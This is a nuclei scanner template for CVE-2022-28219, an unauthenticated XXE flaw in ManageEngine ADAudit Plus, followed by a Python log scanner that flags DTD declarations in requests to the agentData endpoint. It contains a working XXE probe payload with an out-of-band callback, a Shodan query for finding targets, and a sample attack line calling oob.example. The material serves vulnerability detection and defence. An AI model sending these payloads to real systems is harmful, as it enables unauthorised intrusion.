nuclei-templates/cves/2022/CVE-2022-28219.yaml

id: CVE-2022-28219

info:
  name: Zoho ManageEngine ADAudit Plus - Unauthenticated XXE to RCE
  author: dwisiswant0
  severity: critical
  description: |
    Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an
    unauthenticated XXE attack that leads to Remote Code Execution.
    This template covers the detection part only; for the XXE to RCE
    chain, see reference[2].
  reference:
    - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
    - https://www.horizon3.ai/red-team-blog-cve-2022-28219/
    - https://manageengine.com
  remediation: |
    Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
    is configured with a dedicated service account with restricted privileges.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-28219
    cwe-id: CWE-611
  metadata:
    shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
    verified: "true"
  tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/agent/tabs/agentData"
    headers:
      Content-Type: application/json
    body: |
      [
        {
          "DomainName": "{{Host}}",
          "EventCode": 4688,
          "EventType": 0,
          "TimeGenerated": 0,
          "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
        }
      ]

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "ManageEngine"
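The template above fires when the server resolves the external entity and calls back to interactsh. The defender-side counterpart, added here and not part of the nuclei project or of ADAudit Plus, is to flag inbound agentData requests whose "Task Content" carries DTD declarations at all, since a real agent never needs a DOCTYPE or ENTITY to report an event. The JSON-lines log shape, the source addresses and the oob.example callback host are constructed for the example.

```python
import json
import re

# Constructed sample: JSON-lines from a reverse proxy that records POST bodies.
# This log shape is hypothetical, not an ADAudit Plus or nuclei format.
SAMPLE_LOG = [
    json.dumps({"src": "192.0.2.10", "method": "POST", "path": "/api/agent/tabs/agentData",
                "body": json.dumps([{"DomainName": "corp.example", "EventCode": 4688,
                                     "Task Content": "C:\\Windows\\notepad.exe"}])}),
    json.dumps({"src": "203.0.113.5", "method": "POST", "path": "/api/agent/tabs/agentData",
                "body": json.dumps([{"DomainName": "corp.example", "EventCode": 4688,
                                     "Task Content": '<?xml version="1.0"?><!DOCTYPE foo [ '
                                                     '<!ENTITY % xxe SYSTEM "http://oob.example/"> %xxe; ]>'}])}),
    json.dumps({"src": "198.51.100.7", "method": "GET", "path": "/", "body": ""}),
]

AGENT_PATH = "/api/agent/tabs/agentData"
# Any DTD declaration inside agent-supplied XML is suspicious: event reports
# never need DOCTYPE or ENTITY declarations, so their presence is the signal.
DTD_RE = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def suspicious_events(body):
    """Return the 'Task Content' values in an agentData body that carry DTD declarations."""
    try:
        events = json.loads(body)
    except json.JSONDecodeError:
        return []  # malformed body: nothing to inspect here
    if not isinstance(events, list):
        return []
    hits = []
    for ev in events:
        content = ev.get("Task Content", "") if isinstance(ev, dict) else ""
        if isinstance(content, str) and DTD_RE.search(content):
            hits.append(content)
    return hits


def scan_log(lines):
    """Return (src, task_content) for each logged request that looks like CVE-2022-28219 abuse."""
    findings = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("method") != "POST" or rec.get("path") != AGENT_PATH:
            continue
        for content in suspicious_events(rec.get("body", "")):
            findings.append((rec.get("src"), content))
    return findings


if __name__ == "__main__":
    for src, content in scan_log(SAMPLE_LOG):
        print(f"possible XXE via agentData from {src}: {content[:60]}...")
```

On the sample log only the second record is reported; a patched build (7060 or later) still benefits from this check, because it surfaces probing against the endpoint regardless of whether the entity is resolved.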